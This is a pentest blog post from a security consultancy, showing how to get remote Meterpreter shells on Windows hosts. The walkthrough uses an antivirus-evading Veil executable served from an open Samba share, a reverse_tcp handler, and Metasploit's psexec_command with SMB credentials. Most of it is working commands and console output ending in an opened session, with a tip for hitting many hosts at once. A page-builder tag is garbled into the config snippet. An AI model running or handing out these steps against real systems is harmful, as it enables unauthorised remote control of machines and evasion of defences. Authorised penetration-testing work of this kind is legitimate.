Skip to Main Content
May 12, 2014

Moar Shellz!

Written by Larry Spohn
Any experienced pentester can name at least five or six different tools used to attain shell access on a remote system. I can think of eight off the top of my head:
  1. Metasploit psexec
  2. Metasploit psexec_psh
  3. Windows psexec executable
  4. Impacket psexec python script
  5. pth-winexe
  6. pth-wmis
  7. smbexec
  8. Veil-Catapult
All of these tools work and have their strengths and weaknesses. I'm going to share one more method that I recently discovered, using the Metasploit "psexec_command" module, created by Royce Davis (@r3dy__), from Accuvant LABS. First, we need to create an AV-safe executable to deploy to our target. If you haven't checked it out yet, Veil-Evasion is one the easiest ways to create AV-safe executables. After we have an executable, we simply create an SMB share for our targets to access. Add this section to "/etc/samba/smb.conf": 
[fusion_builder_container hundred_percent="yes" overflow="visible"][payloads$]
   comment = Payloads
   path = /root/veil-output/compiled
   browseable = yes
   read only = yes
   guest ok = yes
   public = yes
In Kali Linux, Samba is not running by default, so we need to start it: 
root@kali:~# service samba start
[ ok ] Starting Samba daemons: nmbd smbd.
Next, we startup Metasploit and open a listener: 
root@kali:~# msfconsole
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


Large pentest? List, sort, group, tag and search your hosts and services
in Metasploit Pro -- type 'go_pro' to launch it now.

       =[ metasploit v4.9.2-2014043001 [core:4.9 api:1.0] ]
+ -- --=[ 1355 exploits - 830 auxiliary - 237 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops      ]

msf> use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 0.0.0.0:443 
msf exploit(handler) > [*] Starting the payload handler...
Now, we setup "psexec_command" and configure the module to run the executable payload directly from our SMB share: 
msf exploit(handler) > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set COMMAND start \\192.168.81.196\payloads$\TrustedSec39.exe
COMMAND => start \192.168.81.196payloads$TrustedSec39.exe
msf auxiliary(psexec_command) > set RHOSTS 192.168.81.202
RHOSTS => 192.168.81.202
msf auxiliary(psexec_command) > set SMBPass OMGDontPwnMe!
SMBPass => OMGDontPwnMe!
msf auxiliary(psexec_command) > set SMBUser TrustedSec
SMBUser => TrustedSec
Pull the trigger and cross your fingers: 
msf auxiliary(psexec_command) > exploit

[*] 192.168.81.202:445 - Executing the command...
[*] Sending stage (769536 bytes) to 192.168.81.202
[*] 192.168.81.202:445 - Getting the command output...
[*] 192.168.81.202:445 - Command finished with no output
[*] 192.168.81.202:445 - Executing cleanup...
[-] 192.168.81.202:445 - Unable to cleanup WINDOWSTempFtHThcznCVkttXJy.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
[-] 192.168.81.202:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(psexec_command) > [*] Meterpreter session 1 opened (192.168.81.196:443 -> 192.168.81.202:14336) at 2014-05-06 09:33:39 -0400
It does leave a randomly named txt file in the "Windowstemp" directory that you need to cleanup manually, but that's it! You can also point RHOSTS to a text file of multiple remote hosts to target. MOAR SHELLZ! This article was written by Larry Spohn | Senior Security Consultant @Spoonman1091.